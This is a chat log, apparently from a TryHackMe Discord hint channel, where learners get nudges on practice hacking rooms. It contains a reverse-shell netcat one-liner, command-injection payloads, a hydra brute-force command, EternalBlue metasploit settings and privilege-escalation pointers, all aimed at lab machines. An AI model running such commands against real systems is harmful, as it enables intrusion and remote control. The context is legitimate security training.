#room-hints

@white salmon to get the script

@sleek harness you need to capture the login with intercept

Send me screenshot when you do this im on phone so i can't help you so much

I completed it with burp didn't try other method

i m solving the owasp top 10 room and i m wondering do I need to get a reverse shell in task 6 or exploit it using command injection only

🤔 today's challenge is interesting

anyone done with today's OWASP challenge?

yeah i'm done with it

I found the exploit and tried to paste it in the textbox in Contact page but the only input I saw when going through the code was target url

not sure if that is the intended way to complete the challenge lol

I'm missing something? Input or the place where I'm inserting it?

I'm missing something? Input or the place where I'm inserting it?
@autumn rivet look at Task 29 again, same method, different exploit

Not sure what's the issue you have faced. Based the exploit, it seems to be quite straight forward

look at Task 29 again, same method, different exploit
@velvet talon thanks

can anyone give me hints how to escalate priveleges in task 6 command injection practical?

can anyone give me hints how to escalate priveleges in task 6 command injection practical?
@true widget you dont have to for the flags

we can read the contents of|| /etc/passwd||so shall i brute force ssh?

coz i dont have the permissions to read the contents of root directory

are you aiming for the last flag?

cuz i dont think you have to do anything with the root dir

nope looking for the strange file in websites root directory?

oh, that is THE websites root directory, not the servers

its a relative path

so i didmt had to get a reverse shell?

not really, but it doesn't hurt 😄

i got a reverse shell and i m struggling to escalate priveleges lol

i ran lin enum

its enough to use the input box of the website

okk i ll try

i couldnt read it from the website when i tried earlier or i might be doing something wrong

What room is it?

owasptop10

man i still couldnt read it

any hints?

i think you still aim for the /root dir.. 😄

the root dir and the website root dir is different, it refers to the webservers root directory

from where the evilshell.php runs basically

okk i ll give one more try!

found it!Man it was there all the time!I m so dumb lol

hello guys doing ljnux ctf room stuck in task2 #4 it says check in crontab i check but it didnt show the flag

plss help

Linux challenges room?

yes

There are multiple places for cron jobs to be shown. Try to enumerate and find some more 🙂

can some one explain to me how || login.js works in overpass room ||please

https://www.sololearn.com/Course/JavaScript/?ref=app

You don't do authentication clientside so you really don't have to know how the login script works

ow thanks ❤️

get rid of that last word of your reply before he sees 😱

@oblique cliff mine ?

yes

beautiful

@stuck fractal nothing weird happened here 😏

I saw

👀

https://giphy.com/gifs/12J1QXPeD10z9m

caught 😩

imagine giving ur heart while 3 days to overpass rooom and still where I start 😿 💔

Need a hint with ||.xaa|| file in CC : Pentest

i tried dirb and gobuster but doesnt give me anything

any other wordlist i can use ?

Both of those tools will work

You sure you’re searching for the right thing?

Don't just scan in the directory you found. Scan on /.

Im scanning in http://<machine.ip>/

got the folder

but no file

The extension argument for gobuster, you use -x php not -x .php

youre also looking for the extension xaa when you should be looking for the extension xxa

@oblique cliff I did use -x xxa... just a typo i made here

yea then if youre running it on the correct directory it should find what youre looking for 🙂

Correct dir and correct VM

what wordlist do i use ?

Well what are you currently using?

because most of them work

i tried dirb and gobuster

which wordlist, not which tool

every tool will find it

dirb i tired the dirb wordlist

That would have found it

So you're doing something wrong

if you show us the command youre using we could help you more @warm sierra

screenshots

Can anybody help me with creating a reverse netcat payload

please

this is my syntax:
msfvenom -p cmd/unix/reverse_netcat lhost=10.11.12.141 lport=4444 R

and what happens when you do that? @keen rampart

This is my output:
mkfifo /tmp/zueh; nc 10.11.12.141 4444 0</tmp/zueh | /bin/sh >/tmp/zueh 2>&1; rm /tmp/zueh

but when I run it, my netcat listener doesnt pick anything up

this is specifically the network services room, and exploiting telnet

whats weird as well, when i run a ping using:
ping ip -c 10, my tcp dump picks nothing up

almost as if theres a firewall in the way

you tried pentest monkey?

@oblique cliff gobuster -e -u <box-ip> -w /usr/share/wordlists/dirb/common.txt -x xxa

pentest monkey?

search pentest monkey reverse shell cheatsheet

just found it

thank you

will try that

same effect

I think it could be a firewall or vpn issue

Is your VPN running directly on Kali?

yes

Should be fine then

hmm

Make sure you prefix stuff with the prefix tho

Otherwise it won't run the commands

what do you mean?

enter .HELP

And you'll see what you're doing wrong

ok

You can only search for file extensions in dir mode, make sure to include dir @warm sierra

gobuster dir -u <box-ip> -w /usr/share/wordlists/dirb/common.txt -x xxa

hey lads

can someone give me a hint to how I can find shiba3's password

The room is learn Linux btw

So, it actually tells you what you need to do

There's a condition

You need to make that condition true

Then run the binary

ah

which binary is it refering to?

None of those

because those are files

And you need to look in your home directory

ah

@final mortar thanks got it

hi 🙂 someone knows the answer to lord of the root room task 2 #6? "What's the method to exploit the system for privilege escalation called?" I complete everything except that, thanks!

We do not give out answers.

just a hint 😉

research the exploit you used

what kind of exploit is it

I did, and I didn't find anything good for the overlayfs exploit... maybe they aim to another exploit?

There are multiple ways to root that box(unintended)

there are some weird files on the box itself that was the intended privesc path, look into what kinda exploit you couldve used to take advantage of thoes

need a hint for OWASP Day 8 Who developed the Tomcat application Googled around, but I can't find something that fits the answer 😩

Yeah, that was a tricky one.. 😄 Don't go for one specific person

Bruh can anyone help me with Sqli in CCPentest ? .... i finished the whole thing except the sqli part

@velvet talon hmmm, ok. so I'm not looking for a person. well the question is a little misleading then ...😄 will try harder then

Bruh can anyone help me with Sqli in CCPentest ? .... i finished the whole thing except the sqli part
Anyone ??

@warm sierra do you have a more specific question than that?

@velvet talon hmmm, ok. so I'm not looking for a person. well the question is a little misleading then ...😄 will try harder then
@marble dagger it is indeed, i would check the details of its release

there are some weird files on the box itself that was the intended privesc path, look into what kinda exploit you couldve used to take advantage of thoes
@oblique cliff I found another way to exploit, i manage to exploit with it but again I cant find the right answer :\

right, i know. You need to go explore the box a bit more and check what the intended privesc path was

in order to answer that question

alright, thank you!

Quick question, is there a way to use msfconsole as just a listener? (its needed) (not shell and listner) I generated a payload via msfvenom but need to catch in msfc

Yes

yeah there all run the reverse_tcp bit too (i don't need that aswell) why i'm asking, thank you for the respose

That sort of question, not relating directly to a specific room, goes in #general @odd panther

Very good point thank you. will do so

@velvet talon must be blind. Can't find it. but the main problem is probably that I don't really know what I'm looking for 😫

@marble dagger The first letter is|| 't'||

@velvet talon must be blind. Can't find it. but the main problem is probably that I don't really know what I'm looking for 😫
@marble dagger check out the license of the software

Or a better one, usually the founder claims the copyright of its software 😄

@dense pike @velvet talon I feel like I'm in a deep rabbit hole now. last thing I got was something including a countries name. It alomst looked right. but it wasn't

it's also not the original developer. You're looking for the current developer

Just search for the ||wikipedia page|| @marble dagger

Prefix it with a word starting with ||t||

For the overpass room, can you guys give a hint to what owasp vuln I'm looking for?

One of the first 3

It doesn't use a database of any kind

hey guys,im on the basic pentest room and stuck a bit with #6 What is the password?

hydra -l J** -P /usr/share/wordlists/rockyou.txt -w 20 -f -t 15 -vV 10.10.116.204 -s 8080 http-get /manager/html

but the 'easy' password dont drop...

when i spoil too much, then lets write directly

Are you supposed to brute for on that room?

I don't remember bruting on it

its the easter egg

Easter egg??

... hint

Well your command seems very wrong

Ah yes that one

You don't need half the stuff in your command

Hold up

You're brute forcing the wrong place

In your command you're brute forcing /manager/html which is entirely wrong

You need to brute force ||ssh||

ah , okay then i give gobuster another shot

No.

You're not reading.

You have the username, you just need to brute force the correct place.

||ssh|| is not a directory.

okay, didnt read the spoil. thx for helping!

Also lowercase

Any hints for the root part too? 😅 (of overpass)

Check the room tags

Run some enum scripts

Think about what you can and can't control

it's also not the original developer. You're looking for the current developer
@toxic scarab Needed that thanks!

Doing OWASP Top 10 Task 21 Day 7 Cross-Site Scripting #2 says go to 10.10.227.70/reflected and craft a reflected XSS payload that will cause a popup saying hello, but this is what I get when I go to the website in my kali machine. Is this the expected behavior?

Go to /

Follow the link

Thank you

for blog should I be ||brute forcing the wp login or will i be waiting a long time cuz the password isnt in rockyou?||

Have you tried it?

There's 2 users. Maybe you can get into at least one of them in under 5 mins

alright cool, im starting the scan now i just wanna make sure i wasnt gonna waste 20 minutes waiting for something to finish that never will

I feel as though I've been lied to. (waited 10 minutes on the other user and nothing as well) ||Should I not be using rockyou?||

never mind it worked, it just took 8:05 cuz my computer is a slow boi

Aight cool bob

I used fastrack tho it took 1.5mins

I don't think it has anything to do with your computer. It took me around 6 minutes too

What wordlist did you use?

still looking for OWASP day 8 #1 who developed the tomcat application already got hints yesterday, but I'm still too stupid to find a answer that fits 😩 alreayd lokked on numerous pages including ||wikipedia||

getting OWASP Day 9 took me less than 10 minutes. but I'm still stuck with Day 8 Task #1. this is getting frustrating 😄

search the question in google and it will pop up

@heavy anvil already did that, for developer of vim that is. nothing that fits. I'm obviously bad at this 😄

well its not a single person its a team

and the number of astricks for the answer of the question is not correct as long as I can remember

It's asking for who made tomcat

Not who made vim

Or who made vimexchange

right just search the question exactly as it is on the google

thanks guys. i'm so stupid. got it now 😊

Hey can i share the writeups i write here? I am new here

Hey can i share the writeups i write here? I am new here
@narrow herald instead submit those in the rooms and let the room creator decide?

@narrow herald or you can submit them in #thm-community-media

After it’s been approved by the room creator ^

Hey guys, last question of Day 4 for Advent of Cyber.

I'm guessing I need to look in the /etc/shadow file but says access denied as the mcsysadmin user.

Anyone got a little clue they can give?

guys stuck in linux Challange 26

any hint

What Room? (Link, Room title, room code from URL)
What Task? (Give the number!)
What question? (Number, maybe also basic details)
What have you tried?
What happened?
What didn't happen?
What did you expect to happen?
A picture paints a thousand words. Don't type a thousand words. Screenshots are awesome. Photos of your screen are not.
(If you want to paint a picture, we'll be impressed but a screenshot is really better)

@pseudo hamlet

Room:-Linux Challange task4 #7

@steady stratus can you pin that in this channel too so I don’t have to copy paste whenever I use it here?

It's already pinned somewhere

#room-help message

Yea in room help. But I have to copy paste it over and it’s annoying on my phone

find / -xdev -type f -print0 2>/dev/null | grep 4ceb

i try this command

@oblique cliff need more info from mine?

As it's #room-hints @oblique cliff i'd be inclined to say no (to copy and pasting the formatting expected in #room-help) (although I absolutely see your reasoning)

People who come here should have a different formatting to their question like:

• What room
• At what stage are they stuck exactly?
• What have they tried so that we can give a hint for something they haven't already tried

Anything further then that should go in #room-help imho

@slate swift I haven’t done that room, but to look at the shadow file you need to be root. So you need to get root access in order to do that task it seems (unless the shadow file has weak permissions on that machine)

ofc you guys are the ones on the ground so, I take your word greatly (:

@steady stratus thats fair, can you pin that then? 😅

No I just want something that’s easily referenced from my phone haha. Cuz I usually go to room help, find the pin, copy, come back here and paste

For sure, I understand (:

I'll pin that if you think it's a good reference

That’d be appreciated 🙂

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

Can someone give me a hint on the last challenge of task 5 of room Agent sudo? Its a bonus challenge. ||Who is agent R?||

It's a basic room, this task covers using la, cat, grep. I don't think it's meant to require privesc.

Hmmmm, anyone else done the Advent of Cyber room and can provide a hint?

Day 4 - Q7

@white salmon See if you can delve a little deeper into the whole theme of the box.

You might be able to find a file somewhere that might mention his real name

@slate swift have you checked the permissions of the shadow file then?

Hm..ok i would do that Thankyou, if i cant find it can i come back and ask again?

Yeah, sure

It's a basic room, this task covers using la, cat, grep. I don't think it's meant to require privesc.

Hmmmm, anyone else done the Advent of Cyber room and can provide a hint?

Day 4 - Q7
@slate swift You can google how to do THAT thing, there will be commands on the internet and just try and you will be able to get it right, its very easy

Also actually, @white salmon, if you've already solved #2 of Task 5, then it should also be there I think

@oblique cliff permission is ---------- 1 root root

@smoke google seemed to suggest that the password is hashed only at creation and stored in the shadow file. Are you saying since I know the password I can figure out the hash?

yea, im pretty sure you stumble upon the name along the way if youre doing that room @white salmon @white salmon

@oblique cliff permission is ---------- 1 root root

@smoke google seemed to suggest that the password is hashed only at creation and stored in the shadow file. Are you saying since I know the password I can figure out the hash?
@slate swift if you know the hash you can crack it using hashcat

its asking for the hash itself, not the password

Oh yes i am sorry

im looking at the room to get a bit more info @slate swift give me a sec

Tah

@slate swift did you read the documentation they gave?

The answer is there, its very straight forward

your answer is right here

make sense of it and apply it and you will get the hashed password

Hmmm, okay, let me poke around

mhm

yea, smoke gave adequate hints, you should be able to solve it now 🙂

OMG, wow. 🤯 I was really over thinking.
I was like surely it doesn't mean look for what I think it means everywhere.

Yes it does. Wow. Hahaha.

I'm following along with the official writeup for year of the fox and am stuck on the RCE step. The guide shows using the following command to get the remote host to ping my machine ||{"target":""; ping 10.9.58.: echo""}||. However when running that I don't see any echo packets via wireshark. Am I doing something wrong with the command? (ip redacted) edit: I changed the command to ||{"target":""; ping 10.9.58.; echo""}||, I don't get a response in burp and still no echo responses either.

hey lads

how exactly am I meant to find shiba4?

All I can find is a directory named shiba4

which isn't a .bin file

the room is learn Linux btw

@wind fog Are you searching for a directory or a file? What command are you using?

find shiba4

and I think I'm meant to find a bin file

though there is none that I can find

File extensions are meaningless

Windows cares

Nothing else really does

i can't run shiba4 though

You assumed it had an extension

cause it's a directory

wait, so what am I meant to do?

@wind fog What's in the directory?

Keep looking

Without an extension

Use find to look for things of type file

this is what's in it

Use find to look for things of type file

theres a lovely room called TheFindCommand which will help with that if you need some assistance 🙂

how can I find this binary though?

find / -name shiba4 | grep shiba4 | grep shiba4

you can use the find command to search for something of name shiba4 of type file

Try this

Why the hell are you piping find to grep to grep?

That's horrifying

right now youre in a directory called shiba4, thats different than a file @wind fog

yea what

And it still doesn't filter error messages

Yeah, I know

I went to /home earlier

Which is the only filter up need @crystal glade

and ran find shiba4

That's not how find works

wdym?

I mean that you misused find

https://tryhackme.com/room/thefindcommand @wind fog I'd, again, recommend completing this

great room!

And looked for all files in currentDir/shiba4/ @wind fog

That's what that command did.

alright

I'll take a look

what find command should I use then?

https://tryhackme.com/room/thefindcommand @wind fog I'd, again, recommend completing this
@oblique cliff this one

You have to learn how to use find

@stuck fractal I used like this but it's looking wrong so probably i need to complete find room

astute observation

You shouldn't be piping find into grep like that

better to be using it correctly than to be hacking together something that sometimes works when find is built to work better

So on YOTF, I'm trying to get the remote host to ping my system. The command is: ||{"target":"";ping 10.9.58.***;""}|| which is in multiple writeups. That's my tun0 ip and I do have access to the search page. I'm really not sure what I'm doing wrong at this point. I'm still not capturing any ping traffic in wireshark.

Wireshark capturing on tun0?

Thanks!

Otherwise you just get encrypted traffic

I need help with the bonus challenge in room Agent Sudo, its task 5 question 3. I tried but cant get anything

@white salmon enumerate more

its on the machine

look at all the files, read the files

OMG

i got it

i am so blind

wow

Thanks alot for your time, i appreciate it @oblique cliff

yay, congrats 😄

hello guys im coping a file from victim to my my THM machine using SCP but it says permission denied

Screenshot

Ok, you wanna break that command down for me? I wonder if you can spot your mistake

scp [options] source destination

simple word plss

So

Your current command

is copying a file from alice@10.10.114.139:/home/alice/flag32.mp3. Where's it copying it to?

im copying to /root direc in my sys

Are you?

You're running that command on the victim

yes

You're copying the file from the machine to itself RN

ok

You haven't told it to copy to your machine

i also have to add my machine ip add

There's a better solution

You can just run that SCP command on your attacking machine

Because you specified exactly where to get the file from

hello guys Stuck in Linux Challenge room Task 5 #4 dont know to recover flag from .mp3

do google search but didnt find anything

Have you listened to it?

is that file have sound

i try to listen but no sound using THM machine

I'm sure there should be, I've never used it.

Get it onto your host machine and listen to it

It does have sound

yes ^ the in-browser doesn't convey sound so well unfortunately

if you can find a way to download it to your host as boblo said

you'll get the answer you need

I prefer “blabla” 👀

I pronounce your name as "bob-lob-law"

say it fast

like 3 times

https://www.youtube.com/watch?v=FOtDNXfMyD0
https://www.youtube.com/watch?v=mwWAsNZTnug
@white salmon

i am a master of tongue twisters

i'm gonna hack into your blog and delete my traces, so that way you can't find me via your bob lob law blog logs

I tried saying that lol

Anyone have ny hint to offer on the submission of the user flag for the jeff room please?

Anyone have ny hint to offer on the submission of the user flag for the jeff room please?
@maiden flower MD5

yes this I have tried

the full string and just the bit in the braces

but the bob loblaw law blog logs are super secure (i couldnt think of a good tongue twister to keep in going, sorry)

the full string and just the bit in the braces
@maiden flower braces

pretty sure I tried this but will go again

yes I had tried this its having none of it 😦

can I PM @wraith tapir just for my sanity here

Yeah no prob

can someone please help me with this?

I've done every thing else in the room and am stuck on this

I have no clue how to find the answer

Did you find the binary?

nope

never found it

I'm on the Learn linux room btw

You'll have to use the find command to locate the shiba4 file

i tried that

it just showed me the shiba4 directory

Then you're using it wrong still

you didnt do the room thefindcommand did you?

i did

cuz youd know how to find it if you had

most of it anyways

do all of it

Remember, it's a binary, so it's a file

How do you use the find command to only look for files?

And no one said it's in /home

is it in root then?

Well, we don't know

find -type f

that's why you gotta search the entire system ;)

Remember, it's a binary, so it's a file
@white salmon Technically speaking everything is a file on Linux. 😉

please someone just give me a hint 😭

i wanna die at this point

youve had a lot of hints

just slow down and think about the find command

@tidal sedge All directories are files but not all files are directories

please someone just give me a hint 😭
@wind fog Use find. On the whole system. Looking for files. With the right name.

and what exactly youre searching for

you've told me to just use the find command

alright

i shall try

thank you barack

https://en.wikipedia.org/wiki/Everything_is_a_file

If that's true, then why does find -type f never show directories?

like this?

No

damn

You know how to look for files with a certain name

🤔

keep trying

-name?

how closely did you pay attention to the room the find command?

Read manuals

?

try it and find out

it's telling me permission denied

and I don't know the root password

https://tenor.com/view/exap-head-bang-kill-me-gif-9924281

1 you can filter out the permission denied
2 they dont all say permission denied

hmm

Try adding -xdev 2>/dev/null

-readable?

I really recommend not bruteforcing #room-hints for answers

And reading the manuals and doing the research on how to do things

Try adding -xdev 2>/dev/null
@white salmon thanks man

I really recommend not bruteforcing #room-hints for answers
@stuck fractal I know, this was my last resort, I've been on this single question for hours now

and am quite desperate for an answer

Yeah, except once you've been given the hints you should keep trying yourself

woop woop, I finally bloody got it!

thanks for the help guys

hey guys help plz lmao

im stuck on the linux room

and it asks to create and run the noot.txt file

Re-read it

Because you have misunderstood

really?

okay

pog im going nowhere lmao

the cat command outputs it's contents

It doesn't say run the noot.txt file

you have one executable file

😭

shiba1?

We don't use that word here.

Not you.

https://tenor.com/view/choro-lagrimas-bico-chateada-gif-6165001

The ablist slur.

sorry

hello

facing problem in brainstorm room

If it's FTP, switch to an EU VPN server

okk

it's a platform issue that's being investigated

damn youre smart, he didnt even ask the question yet

A lot of people have the same issues usually

You can complement me all you want, still not going to let you use the slur 😉

not what im trying ot achieve lol

I get it wont curse here

also i got mine working ty

Reading the question is incredibly important

Sitting back, and applying some logic is too. Why would you be able to run an empty file that you just created and somehow get a password?

idk lol

Exactly

i just want sure what binary - this is my first room

It lists it

true

If you read the room, including task titles

Reading is a key skill

Without reading the question and the info you're given, it's going to go badly for you

looks like EU vpn works awsome thank you

@white salmon hey sexy :0

hey

wanna be friends?

ugh

https://tenor.com/view/cat-hack-the-planet-workaholic-gif-13330277

sudo openvpn --configure test.opvn

such a long command

ikrrrrr

hey lads

does anyone know what the root password is in the learn linux room?

No

#room-help should be the place

for a full answer

Because ubuntu doesn't normally have a root password

@white salmon We do not give out answers, so that's false.

oh k

@stuck fractal hey mate

if there is no password how do I access root?

Don't just ping me when you want help

That's not how this works

oh sorry

i just kind of assumed that you replied to me so I could reply back

sowwy

What room is that?

I might help ya

linux

learn linux

first room

if u could help that would be great

😉

wdym no password, u should've been root already

Nope.

just a sec

nope, so, any idea how to access the file then?

Become root.

You need to, that's the only way

how then?

they never told me the root password

That's what you'll have to figure out :)

Maybe the password isn't the key

but... but... they never told me

There's other ways besides passwords to get to root

😪

Hold on, i had to get to that room

Unfortunately, you're going to have to figure a lot of things out for yourself

That's part of the fun of penetration testing, though.

yeah, i've figure that out by now

i don;t mind though

Did u get to the point where u switch to nootnoot user?

ermmm

gimme a sec

let me take a look

what point is that?

Try getting this script onto the machine, and running it

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

what's that?

It's a Linux Enumeration script

It'll basically scan the entire machine for you, and tell you some obvious attack vectors and vulnerable things.

Anyways

U didnt move from shiba1 at all?

yeah

Cauz there are shiba2 and shiba3

users

i'm on the very last question

i've been all of them

just not root

You need to use the knowledge from previous tasks

Not all of the users

Usually the first thing I do when I gain access to a user and password, I always check sudo -l btw

It's a quick and easy way to find privilege escalation ;)

oh, thanks man

let me try that

@wind fog ah now i remember

none of them can run root

I struggled on this one few days

ago

ah, what worked?

none of them can run root
@wind fog wat

give me a hint

not a full answer

Not sure if you really checked all users.

shiba 1 to 4

all the ones I had access to

Remember, not all the users are just shiba

erm, wait what?

really?

The hint im gonna give u is to use find command

oh true

And look through files owned by shiba users

there is noot and nootnoot

alright, let me take a look

Maybe you can find creds for one of those

u need nootnoot

how do u find the password for them?

By looking

look for suspicious files

or at least, out of place files

alright

imma do that

actually now when i remember how much i tryharded for this

i gotta forget it somehow

i found the ll file

not sure what to do with it though

any hints for blog privesc? the ||SUID for checker can't really be taken advantage of that I can see||, then I found ||the password for bjoel, but thats for the wordpress site, not his actual account|| and I can't find anything else that's interesting to me

what file

@oblique cliff Do some RE on the binary

@stuck fractal oof thats what i thought it was gonna be, thanks

@oblique cliff remember everything I taught you1!!!

Blog was what made me actually get into RE

@oblique cliff Ultra basic RE, like chuck a decompiler at it

find / -user <username> -type f

it's very very basic tho

yeah

should be child's play for you

with the hackpark thing, is there a specific way to reverse image search on firefox? cos saving the image and then using google image search isnt giving me the answer

oh damn yall are making me nervous if i dont figure it out now

use this

oh damn yall are making me nervous if i dont figure it out now
@oblique cliff no pressure 👀

@grizzled lichen Hey man, how do I filter out all the permission denied?

Add 2>/dev/null to your find command

at the end

thanks man

how does that command work though?

It sends the output of everything you don't want to see into /dev/null

which is a fancy word for the trash

(actually more like a void i guess)

damn, I'm glad I finally have a fancy name to be called

The real purpose of /dev/null is that it's a file that you can send input into, but the output literally just doesn't exist.

So it basically eats any input you send into it, and nothing comes out.

ah, interesting

how does that command work though?
@wind fog It's not really a command

You're redirecting the output like you've done before

yeah i know, i just didn't know the right name for it

what does ll do? 😪

cat it

erm

@wind fog any progress?

not really man

im kinda lost

i have no clue how im meant to get to root

Let me explain u

by using the find command

u are looking for files out of place

owned by each user

the find command didn't give me anything though

for example

not really

for example
@grizzled lichen yeah?

mostly users make files in their home directories

look for files that arent made in that dir

hint:

||shiba2 user||

oh epic

is this it? 🤔

No

not that user

That's a binary that you used earlier

not that user
@tribal olive Not that folder

ah

yes

oof, lemme take another look

find / -user shiba2 -type f 2>>/dev/null

that should be the command

output is like

as far as i remember

only 15ish files so it really shouldnt be hard

i found shiba2 in etc/shiba

is it that one?

u use that dir before in a task i think so no

alright

it outputed like 40 things

should i just look through them or what?

yea

everything interesting

post here

and i ll tell u if u are on good path

here are some of them

One of those looks suspicious to me

You can ignore everything in /proc/ tbh

Yea totally smth suspicious there

.profile? 🤔

those arent created by user manually

user just owns them

@stuck fractal got it, thanks :D
embarrassingly the thing i ended up asking for help on was transferring the file to my kali machine cuz i thought you needed write permissions to do that, but you only need read permissions 🤓

@white salmon thanks, as always

Learning how to copy files is great

Learn a dozen different ways

oh i just did a regular python server and wgetted it

SCP best

name 3 others

gogogo

You can also just navigate to the ip-address:port with your web browser once you've opened up a HTTP server

and navigate the entire machine like a directory

(and download files directly from web browser)

just by clicking

You could host a ruby HTTP server

this maybe?

cat it

perm denied

ls -la?

tough time

what user owns that file?

shiba2

shiba2

lemme switch over to him

and u are? shiba4

yes, i am not logged in as noot noot!

meaning I can access the root file

woohoo

name 3 others
@oblique cliff Netcat, http servers, upload via FTP, upload via SMB, base64 encode and copy text

hey i said 3

And I disregarded that guidance

scribbles down in notes

i forgot you could transfer files with nc

id say i forgot but i never knew

alright, I'm lost, I'm now in nootnoot but am still unable to access root and haven't got a clue where to go from here 😪

Read back

How can you run commands as root

sudo?

Try things.

damn, i'll try

https://tenor.com/view/bye-slide-baby-later-peace-out-gif-12999722

he did it

poggg

pog

i did it gang

i wish to thank all of you

https://tenor.com/view/bye-slide-baby-later-peace-out-gif-12999722

https://tenor.com/view/kiss-gif-10053867

remember me when you become a millionaire

P O G

nah

imma now run for president

@wind fog well good luck with that task .. it took me 3-4 days to barely solve it.

i only finished it yesterday.

yeah, i would have been on it for weeks if I didn't have help

i got the concepts, just not how they related to one another

yay people my level

it's pretty hard this one i'll tell you. you reaaally need to focus and don't give up.

i felt so frustrated at this task, but did some research, and did other rooms (i grew more knowledge on other things too), and still didn't get it without the hints that were provided here.

but trust me .. this task will teach you how to navigate through linux comfortably.

Room: Powershell Scripting - Task 3, Question 3 "How many cmdlets are installed on the system(only cmdlets, not functions and aliases)?"
Why is this not ||7935||?

You're not filtering correctly

Oh, i thought it would automatically only take cmdlets

ty

Is this room broken on task 8? https://tryhackme.com/room/xss

Or is it looking for something very precise?

yes and yes

hey peeps

how would I use the search command if I wanted to search for a file which contained what i was looking for

for example I'd like to find any file containing flag in it's name

That sounds like a question for google first

And a recommendation to redo the find room

😭

could you maybe tell me? cause you fairly likely know

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

alright

could you tell me if my current try is wrong of if there is nothing containing flag at least?

Why not create a file and try for yourself?

alright, im going to assume that it i did it wrong

Inspect the flag21.php file. Find the flag.

do i need to download anything ? most of them say that i would need to use the command ||PHP|| which requires me to download a ||PHP|| program.

I'm not sure what site/"old friend" this is referring to in the Burp Suite Room Task 11 #1. Could I get a little nudge in the right direction. (I also don't believe it is in the deployable machine's website, but I could be wrong).

Its referring to the juice shop still. There is no second site

Just explore the website and you should come across it unknowingly

And old friend is referring to a system with Burp. Make sure you read the previous parts as to what the old friend could be

I am very new to cyber security (passed my Sec+ this month) I am really stuck on this question in the "intro to research" room. I have completed every question except this one. If someone could point me in the right direction I would be very thankful.

The question is "If a password hash starts with $6$, what is the format it is (Unix Variant)"

I know the hash is || SHA-512 || but im not sure what it means by "What format is it"

The hint that follow with this question is || cry ||

I'm so lost D: second day scurrying the internet for this answer.

It's not quite sha512

Sha512 doesn't have a prefix, is typically hex output, and doesn't have a salt when it's purely sha512

it's related to sha512

So would it fall under crypt(C)?

That's the library that is normally used to implement it

The way I got where i am is by searching a hashcracker and looking at examples, from that I concluded that it was most likely SHA-512. From there, I looked up SHA-512 and "Unix Format" which led me to the wiki for Crypt(C). Not sure if im going in the wrong direction

It's not quite sha512, as I said

Crypt provides unix hashing functions like md5crypt which are used in /etc/shadow or /etc/passwd

Ok that's actually a fairly big hint

thanks man! I think I got it.

help with owasp top 10 day 3 task 12 voucher? i found the hint pointing back to the main page but i cant figure anything out

My dudes, I'm doing the Hydra-ha-ha-haa challenge from the Christmas room. Any hints on how to find the username?

@final sluice you'd have had to email the email on the home page

@cosmic phoenix you're told the username

Is that a hint?

You are told what username to use

ah, I kept thinking about doing that but i kept thinking that was too simple derp

Oh that's it ? Alright great. Thanks James

Hi can I have a hint for the privesc on GateKeeper ?

I ran winpeas and windows-exploit-suggester but I'm still stuck.

1 hint is read the room description
2 hint is look for stuff that isn’t installed by default on the machine

so with the .lnk file, I'm on the right track ?

What lnk file

Fifrefox.lnk on the Desktop's user

Explore it and find out 🤷🏿‍♂️

aight thanks 😉

~~google is your friend here ~~

in room "Burp Suite" task 6, section 7: Defined in RFC 6455 as a low-latency communication protocol that doesn't require HTTP encapsulation, what is the name of the second section of our saved history in Burp Suite? These are commonly used in collaborate application which require real-time updates (Google Docs is an excellent example here).

can find this info, not even on the hint site

https://tools.ietf.org/html/rfc6455

omg, sorry... im just blind

hey guys

can someone give me a hint as to which two files this is refering to?

the room is linuxctf task 2

@wind fog what have you looked for

It’s not meant to be a trick it’s very straightforward which two files

I'm not really sure what to look for

i've search for files which might stand out but found none

What files are in your home directory

these

That’s not your home directory

That’s the home directory

oh nvm

found them

cd ~ brings you to your home directory, or just cd

i was looking in the wrong account, I was meant to be bob

thanks for the help m8

No problem

@final mortar imo if you just tell people that command they don’t learn what that means and understand that ~ brings them to the users home directory

That’s why I try to ask leading questions a bit more. Again, just my opinion but I feel like that helps people a bit more

Yeah I mean I read what you were helping with just supplemented the info

wait I can improve it

Better 🙂

That’s why I try to ask leading questions a bit more. Again, just my opinion but I feel like that helps people a bit more
btw you know I do that 🙂 don't you 😦

I know, you’re awesome with help! I just saw you give the command right there

No worries

am i missing something with the exploit(windows/smb/ms17_010_eternalblue) in msfconsole? it is stuck on [*] 10.10.46.84:445 - Sending all but last fragment of exploit packet. its for the eternalblue room

Show your options and the output please

Screenshot

Try different payload

try with windows/x64/meterpreter/reverse_tcp

i didn't select a payload. guess i missed that. set payload windows/x64/meterpreter/reverse_tcp

still not finishing the connection it seems

can you give it some time to finish

ya i have been waiting about 5-10 mins during each try. so wait longer?

What happens now when you run it?

No it should take < 1 minute

same thing. wonder if i made it unstable

Like seconds

Update your metasploit

And then if that doesn’t help reboot the box

ya i have been waiting about 5-10 mins during each try. so wait longer?
@sonic fox you changed the payload and waited 10 mins, I just suggested it 1 min ago

And if that doesn’t help show us again

no it still running

It's supposed to take longer at that stage

try restarting Metasploit as bob said, ensure the payload is correct, verify your connection cause I just checked, your instance works fine https://i.imgur.com/vAWPeY7.png

@sonic fox

Hi hope you're well.

I'm going through the ten days of OWASP and I'm on the [Day 5] Broken Access Control (IDOR Challenge)

I visited the site and I believe that the goal is to change the last number at the end of the url to access another persons notes

The url being http://10.10.89.241/note.php?note=1

I changed the 1 to a 2...

I've run through a range of about 3500

am I doing something wrong?

nvm, just realized that I should've started at 0

😆

0 is uid for root in linux, so that's where it comes from ig

Ahh got you, thanks

hey lads

is release some kind of command or what?

if it is could someone maybe give me a site explaining how to use it, cause I can't find one

It's referring to a file.

You really need to give people context when you ask questions about rooms like this.

oh, it's a file, I thought it was a command

thanks for the help mate

thanks @final mortar and @oblique cliff. had to update metasploit and restart.

✌️

i got shell.... now what?! j/k

The room will guide you 🙂

xD just saw the jk

welp, I have found the release file, which is just a text file full of code with no flag of any kind

any idea how I could get closer to the answer?

the room is linuxctf btw, task 2

kernel version is what "uname -a"?

i've tried that already

a is for all

just gives me this and no flag 😪

You haven’t found the correct release file if it’s not in there

u sure?

i couldn't find any other release file

